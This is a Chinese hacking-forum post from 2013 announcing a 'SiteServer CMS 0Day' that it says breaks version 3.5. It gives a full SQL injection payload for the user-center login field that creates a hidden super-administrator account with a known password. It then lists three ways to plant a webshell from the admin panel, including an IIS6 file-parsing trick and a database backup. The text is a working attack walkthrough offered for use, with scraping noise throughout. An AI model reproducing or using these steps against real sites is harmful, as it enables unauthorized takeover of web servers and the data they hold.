找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2624|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
. e- U1 \- Q5 b5 x
9 W2 _4 y' K: f+ @stieserver官网:www.siteserver.cn
% j! c0 I: t8 p0 G
* y: p: L5 Q9 o* y* ~
' g2 W2 s# H8 w* V. N: T# v/ O$ a. _& P8 T7 ]8 ?* l, t7 z
EXP:
. \- k6 T/ T; z7 F* T  y# E5 h) P4 x6 I" S) F# W0 S2 L* V; I
直接访问UserCenter/login.aspx9 {. E& m' b2 n5 u. X  M) s
6 o8 ^4 ~4 ~) j5 f# l$ l
, T" F7 u! \7 N5 A; o5 N! x' v; \

: C6 c( J# c$ R用户名处输入:( p) j" O) u% d2 ~2 {
) y2 W5 s) D1 m2 h& }! T+ G" W
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--% t9 H  A, j* v; g# f7 G% w4 s! k7 n
( f2 n# G3 v" J7 }. J, c$ n
1 g  B# y1 Z" {, N2 b" x0 S  ~$ i) w

- g/ v, q( C& y# k! x9 g2 `密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。+ N+ j8 s" w- ~( I- o
0 Q6 V' n2 [. n

9 [- v/ r! a3 o. o9 _# e1 Z) h9 u# H
之后再访问后台SiteServer/login.aspx用插入的用户登陆- o6 C( n8 d" w7 _/ X6 `! C
  C1 {; O% s6 R* Z# g) r
/ d# `+ a( J4 K. l- g" n  p1 _' q
: S1 D$ Z% ~- b& ~$ Y# C$ R% O
后台拿webshell的三种方法:! V$ I& ~! f4 e* \4 |7 r

/ g: f7 l% F- V1 d# p一、' M  C& @. D: s8 W' ^: N0 b1 a

1 `; F: U( Y8 R/ ~7 ?: r" c站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
+ P5 w4 N6 ^7 J) }' x1 @1 d$ U& m5 p) ]
二、: y  `+ i  ?) g8 G- S0 ?* N% z
$ U* g& y. v0 X- x8 k! d8 J" H3 j
成员权限-》添加用户-》用户名为:1.asp7 x6 R. p9 p* J

* R8 a. ~) {5 a1 ehttp://127.0.0.1/usercenter/
) _# U3 o7 J( \. [5 _' Y+ N% t
6 X0 j  j2 L" g- [4 p% H用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell# j" b0 V2 q4 b
$ w( b4 b* k, c
(ps:后台添加用户时不会验证是否含有非法字符)
" R5 u- N9 b* G$ i: C* Q+ X- p/ a; M" ^) H
三、
2 ?4 p5 ~' V% x7 \- Y: q  T9 g( \9 R8 W9 A; m0 b; s
系统工具-》实用工具-》机器参数查看  \- h" z; I& C) H# z8 f. P; d  W
可以看到数据库类型、名称,WEB路径
( `+ E$ y" N! e; B; \1 ]' D6 ^
# C: T1 @) ~2 [' L/ T* w/ g$ B, E% I* w系统工具-》数据库工具-》SQL语句查询! j* k+ |0 s; i: F8 _2 z8 g0 c
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。0 Q9 r9 [" s1 T% \- ^
& a4 Z3 F+ M; i5 s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表